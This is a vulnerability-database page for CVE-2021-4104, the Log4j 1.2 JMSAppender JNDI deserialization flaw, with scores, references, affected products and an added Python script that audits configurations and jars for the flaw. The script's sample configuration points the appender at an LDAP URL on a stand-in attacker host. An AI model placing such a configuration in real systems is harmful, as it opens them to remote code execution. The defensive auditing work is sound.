CVE-2021-4104

Published on: 12/14/2021 12:00:00 AM UTC

Last Modified on: 04/20/2022 12:16:00 AM UTC

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Certain versions of Log4j from Apache contain the following vulnerability:

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

  • CVE-2021-4104 has been assigned by [email protected] to track the vulnerability; it is currently rated as HIGH severity.
  • Affected Vendor/Software: Apache Software Foundation - Apache Log4j 1.x, version 1.2.x
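The description above names the two configuration properties (TopicConnectionFactoryBindingName and TopicBindingName) that JMSAppender hands to a JNDI lookup, and notes that the appender is only reachable when the configuration wires it up. The Red Hat reference on this page documents deleting the JMSAppender class from the log4j jar as the mitigation, and the oss-security reference does the same for JMSSink (CVE-2022-23302). The Python below is an added example, not code from the CVE record, the Log4j project or any vendor advisory: it checks both preconditions, the appender being configured in log4j.properties or log4j.xml and the class still being present in the jar. The appender names, the host attacker.example, the JNDI names and the stub jar contents are constructed sample data.

```python
"""Audit Log4j 1.2 inputs for the CVE-2021-4104 preconditions (added example,
not code from the CVE record or the Log4j project; sample inputs constructed)."""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

JMS_APPENDER = "org.apache.log4j.net.JMSAppender"
# Properties JMSAppender resolves through InitialContext.lookup().
JNDI_PROPS = ("TopicBindingName", "TopicConnectionFactoryBindingName")
# JMSSink is the sibling class behind CVE-2022-23302, referenced on this page.
RISKY_CLASSES = ("org/apache/log4j/net/JMSAppender.class",
                 "org/apache/log4j/net/JMSSink.class")
# log4j.appender.<name>[.<property>]=<value>
_PROP_RE = re.compile(r"log4j\.appender\.([^.=\s]+)(?:\.([^=\s]+))?\s*=\s*(.*)$")


def scan_properties(text: str) -> dict:
    """Map each JMSAppender declared in a log4j.properties file to the JNDI
    names it would look up. Line order does not matter."""
    classes, bindings = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue
        m = _PROP_RE.match(line)
        if not m:
            continue
        name, prop, value = m.group(1), m.group(2), m.group(3).strip()
        if prop is None:
            classes[name] = value
        elif prop in JNDI_PROPS:
            bindings.setdefault(name, {})[prop] = value
    return {n: bindings.get(n, {}) for n, c in classes.items() if c == JMS_APPENDER}


def scan_xml(text: str) -> dict:
    """Same check for the log4j.xml (DOMConfigurator) format."""
    found = {}
    for app in ET.fromstring(text).iter("appender"):
        if app.get("class") == JMS_APPENDER:
            found[app.get("name", "?")] = {p.get("name"): p.get("value", "")
                                           for p in app.findall("param")
                                           if p.get("name") in JNDI_PROPS}
    return found


def risky_classes_in_jar(jar_bytes: bytes) -> list:
    """JMS classes still shipped in a log4j 1.2 jar; an empty list means the
    'delete the class from the jar' mitigation has been applied."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
    return [c for c in RISKY_CLASSES if c in names]


def audit(properties_text: str, xml_text: str, jar_bytes: bytes) -> dict:
    """Both the configuration and the code path must be present for
    CVE-2021-4104 to be reachable; report each and the combined verdict."""
    appenders = {**scan_properties(properties_text), **scan_xml(xml_text)}
    classes = risky_classes_in_jar(jar_bytes)
    return {"jms_appenders": appenders, "jar_classes": classes,
            "exposed": bool(appenders) and bool(classes)}


# --- constructed sample inputs, not taken from any real deployment ----------
SAMPLE_PROPERTIES = """\
log4j.rootLogger=INFO, stdout, jms
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.ProviderURL=ldap://attacker.example:1389/
log4j.appender.jms.TopicConnectionFactoryBindingName=ConnectionFactory
log4j.appender.jms.TopicBindingName=Exploit
"""

SAMPLE_XML = """\
<!DOCTYPE log4j:configuration SYSTEM "log4j.dtd">
<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="audit" class="org.apache.log4j.net.JMSAppender">
    <param name="TopicConnectionFactoryBindingName" value="ConnectionFactory"/>
    <param name="TopicBindingName" value="jms/AuditTopic"/>
  </appender>
  <root><level value="info"/><appender-ref ref="audit"/></root>
</log4j:configuration>
"""


def build_sample_jar(with_jms: bool) -> bytes:
    """Stand-in for log4j-1.2.x.jar: placeholder class bodies, real entry names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("org/apache/log4j/Logger.class", b"\xca\xfe\xba\xbe")
        for c in (RISKY_CLASSES if with_jms else ()):
            zf.writestr(c, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    print(audit(SAMPLE_PROPERTIES, SAMPLE_XML, build_sample_jar(True)))
```

Run as a script it prints the report for the constructed inputs; on a real host, feed it the contents of each log4j.properties or log4j.xml on the classpath and the bytes of every log4j 1.2.x jar. A hit in jms_appenders with an empty jar_classes list means the class-deletion mitigation is in place; a hit with the classes present is the CVE-2021-4104 precondition, and the remaining question is who can write to that configuration file, which is what the HIGH attack complexity and LOW privileges in the CVSS vector above encode.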

CVSS3 Score: 7.5 - HIGH

Attack Vector: NETWORK
Attack Complexity: HIGH
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

The HIGH attack complexity and LOW privileges reflect the precondition in the description: the attacker must already be able to write the Log4j configuration. Once that holds, the JNDI lookup gives full control of the logging process, hence HIGH on all three impact metrics.

CVSS2 Score: 6 - MEDIUM

Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL

CVE References

  • Red Hat Customer Portal, CVE-2021-4104 (MISC): access.redhat.com/security/cve/CVE-2021-4104
  • SonicWall Security Advisory SNWLID-2021-0033 (CONFIRM): psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033
  • CVE record for the related CVE-2021-44228 (MISC): www.cve.org/CVERecord?id=CVE-2021-44228
  • Oracle Critical Patch Update Advisory, April 2022 (MISC): www.oracle.com/security-alerts/cpuapr2022.html
  • Oracle Critical Patch Update Advisory, January 2022 (MISC): www.oracle.com/security-alerts/cpujan2022.html
  • NetApp Product Security, CVE-2021-4104 Apache Log4j Vulnerability in NetApp Products (CONFIRM): security.netapp.com/advisory/ntap-20211223-0007/
  • oss-security, 2022-01-18, CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x (MLIST): www.openwall.com
  • CERT/CC VU#930724, Apache Log4j allows insecure JNDI lookups (CERT-VN): www.kb.cert.org
  • GitHub, apache/logging-log4j2 pull request #608, "Restrict LDAP access via JNDI" by rgoers (MISC): github.com/apache/logging-log4j2/pull/608#issuecomment-990494126

Related QID Numbers

  • 159573 Oracle Enterprise Linux Security Update for log4j (ELSA-2021-5206)
  • 159603 Oracle Enterprise Linux Security Update for parfait:0.5 (ELSA-2022-0290)
  • 159619 Oracle Enterprise Linux Security Update for log4j (ELSA-2022-9056)
  • 179047 Debian Security Update for apache-log4j1.2 (DLA 2905-1)
  • 198633 Ubuntu Security Notification for Apache Log4j 1.2 Vulnerability (USN-5223-1)
  • 20251 IBM DB2 Security Update for Log4j (6528678)
  • 239973 Red Hat Update for log4j (RHSA-2021:5206)
  • 239980 Red Hat Update for rh-maven36-log4j12 (RHSA-2021:5269)
  • 240034 Red Hat Update for parfait:0.5 (RHSA-2022:0289)
  • 240035 Red Hat Update for parfait:0.5 (RHSA-2022:0290)
  • 240036 Red Hat Update for parfait:0.5 (RHSA-2022:0291)
  • 240059 Red Hat Update for JBoss Enterprise Application Platform 7.4 (RHSA-2022:0436)
  • 240060 Red Hat Update for JBoss Enterprise Application Platform 6.4 (RHSA-2022:0438)
  • 240078 Red Hat Update for red hat jboss web server 3.1 service pack 14 (RHSA-2022:0524)
  • 240209 Red Hat Update for JBoss Enterprise Application Platform 7.4.4 (RHSA-2022:1296)
  • 240210 Red Hat Update for JBoss Enterprise Application Platform 7.4.4 (RHSA-2022:1297)
  • 240452 Red Hat Update for parfait:0.5 (RHSA-2022:0294)
  • 257136 CentOS Security Update for log4j (CESA-2021:5206)
  • 353112 Amazon Linux Security Advisory for log4j : ALAS-2022-1562
  • 353124 Amazon Linux Security Advisory for log4j : ALAS2-2022-1739
  • 376187 Apache Log4j 1.2 Remote Code Execution Vulnerability
  • 376415 IBM WebSphere Application Server Multiple Vulnerabilities (Log4Shell) (6526750)
  • 376425 Oracle Hypertext Transfer Protocol Server (HTTP Server) Multiple Vulnerabilities (Log4Shell) (Doc_ID_2817011.1)
  • 671353 EulerOS Security Update for log4j (EulerOS-SA-2022-1276)
  • 751522 SUSE Enterprise Linux Security Update for log4j (SUSE-SU-2021:4111-1)
  • 751523 SUSE Enterprise Linux Security Update for log4j (SUSE-SU-2021:4115-1)
  • 751524 OpenSUSE Security Update for log4j12 (openSUSE-SU-2021:4112-1)
  • 751525 OpenSUSE Security Update for log4j (openSUSE-SU-2021:4111-1)
  • 751556 OpenSUSE Security Update for log4j12 (openSUSE-SU-2021:1612-1)
  • 87483 Oracle WebLogic Server Multiple Vulnerabilities (Log4Shell) (Doc_ID_2817011.1)
  • 940440 AlmaLinux Security Update for parfait:0.5 (ALSA-2022:0290)

Exploit/POC from Github

Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-20…

Known Affected Configurations (CPE V2.3)

Type | Vendor | Product | Version (Update, Edition and Language are All for every row)
Application | Apache | Log4j | 1.2
Operating System | Fedoraproject | Fedora | 35
Application | Oracle | Retail Allocation | 14.1.3.2
Application | Oracle | Retail Allocation | 15.0.3.1
Application | Oracle | Retail Allocation | 16.0.3
Application | Oracle | Retail Allocation | 19.0.1
Application | Oracle | Utilities Testing Accelerator | 6.0.0.1.1
Application | Oracle | Utilities Testing Accelerator | 6.0.0.2.2
Application | Oracle | Utilities Testing Accelerator | 6.0.0.3.1
Application | Oracle | Weblogic Server | 12.2.1.3.0
Application | Oracle | Weblogic Server | 12.2.1.4.0
Application | Oracle | Weblogic Server | 14.1.1.0.0
Application | Redhat | Codeready Studio | 12.0
Operating System | Redhat | Enterprise Linux | 6.0
Operating System | Redhat | Enterprise Linux | 7.0
Operating System | Redhat | Enterprise Linux | 8.0
Application | Redhat | Integration Camel K | -
Application | Redhat | Integration Camel Quarkus | -
Application | Redhat | Jboss A-mq | 6.0.0
Application | Redhat | Jboss A-mq | 7
Application | Redhat | Jboss A-mq Streaming | -
Application | Redhat | Jboss Data Grid | 7.0.0
Application | Redhat | Jboss Data Virtualization | 6.0.0
Application | Redhat | Jboss Enterprise Application Platform | 6.0.0
Application | Redhat | Jboss Enterprise Application Platform | 7.0
Application | Redhat | Jboss Fuse | 6.0.0
Application | Redhat | Jboss Fuse | 7.0.0
Application | Redhat | Jboss Fuse Service Works | 6.0
Application | Redhat | Jboss Operations Network | 3.0
Application | Redhat | Jboss Web Server | 3.0
Application | Redhat | Openshift Application Runtimes | -
Application | Redhat | Openshift Container Platform | 4.6
Application | Redhat | Openshift Container Platform | 4.7
Application | Redhat | Openshift Container Platform | 4.8
Application | Redhat | Process Automation | 7.0
Application | Redhat | Single Sign-on | 7.0
Application | Redhat | Software Collections | -
  • cpe:2.3:a:apache:log4j:1.2:*:*:*:*:*:*:*
  • cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*
  • cpe:2.3:a:oracle:retail_allocation:14.1.3.2:*:*:*:*:*:*:*
  • cpe:2.3:a:oracle:retail_allocation:15.0.3.1:*:*:*:*:*:*:*
  • cpe:2.3:a:oracle:retail_allocation:16.0.3:*:*:*:*:*:*:*
  • cpe:2.3:a:oracle:retail_allocation:19.0.1:*:*:*:*:*:*:*
  • cpe:2.3:a:oracle:utilities_testing_accelerator:6.0.0.1.1:*:*:*:*:*:*:*
  • cpe:2.3:a:oracle:utilities_testing_accelerator:6.0.0.2.2:*:*:*:*:*:*:*
  • cpe:2.3:a:oracle:utilities_testing_accelerator:6.0.0.3.1:*:*:*:*:*:*:*
  • cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
  • cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
  • cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:codeready_studio:12.0:*:*:*:*:*:*:*
  • cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*
  • cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*
  • cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:integration_camel_k:-:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:integration_camel_quarkus:-:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_a-mq:6.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_a-mq:7:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_a-mq_streaming:-:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_data_grid:7.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_data_virtualization:6.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_fuse:6.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_fuse:7.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_fuse_service_works:6.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_operations_network:3.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_web_server:3.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:openshift_application_runtimes:-:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:openshift_container_platform:4.6:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:openshift_container_platform:4.7:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:openshift_container_platform:4.8:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:software_collections:-:*:*:*:*:*:*:*

Social Mentions

Source | Title | Posted (UTC)
Twitter @JoergKethur | @WildFlyAS new day - another cve - what about the CVE-2021-4104 - RedHats JBoss EAP 7 is affected | 2021-12-13 08:57:08
Twitter @JoergKethur | @WildFlyAS please also see access.redhat.com/security/cve/C… for the log4J 1.x Versions - if your application server is confi… twitter.com/i/web/status/1… | 2021-12-13 10:18:02
Twitter @yazicivo | CVE-2021-4104 Log4j 1.x vulnerability in JMS appender (requires privileged access to configuration)… twitter.com/i/web/status/1… | 2021-12-13 11:07:13
Twitter @ipssignatures | The vuln CVE-2021-4104 has a tweet created 0 days ago and retweeted 12 times. twitter.com/yazicivo/statu… #pow1rtrtwwcve | 2021-12-13 18:06:02
Twitter @oss_security | Re: CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2: Posted by Moritz Bechler o… twitter.com/i/web/status/1… | 2021-12-13 21:53:33
Twitter @oss_security | CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2: Posted by Ralph Goers on Dec 1… twitter.com/i/web/status/1… | 2021-12-13 21:53:34
Twitter @warp10io | CVE-2021-4104 | Log4j The class which is the cause of this issue is not included in the distribution of Warp 10. Of… twitter.com/i/web/status/1… | 2021-12-14 08:43:49
Twitter @philrandal | CVE-2021-4104 is just what I don't need right now #log4j | 2021-12-14 10:37:57
Twitter @philrandal | RedHat's bulletin: access.redhat.com/security/cve/C… #log4j twitter.com/philrandal/sta… | 2021-12-14 10:38:58
Twitter @Sh0ckFR | Sources: access.redhat.com/security/cve/C… access.redhat.com/security/cve/C… And confirmations: bugzilla.redhat.com/show_bug.cgi?i… twitter.com/i/web/status/1… | 2021-12-14 11:55:44
Reddit /r/netcve | CVE-2021-4104 | 2021-12-14 11:38:37
Reddit /r/cybersecurity | Cve-2021-4104 vs Cve-2021-44228 | 2021-12-19 02:47:52
Reddit /r/Cisco | CVE-2021-4104 - No word from Cisco on this one | 2021-12-20 19:53:37
Reddit /r/sysadmin | FedEx Ship Manager still has Log4j vulnerability after update. | 2022-01-11 00:14:00
Reddit /r/u/detoxtechnologie | What Is Log4Shell? The Log4j Vulnerability Explained in 2022 | 2022-01-25 05:25:17

© CVE.report 2022

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registered trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.
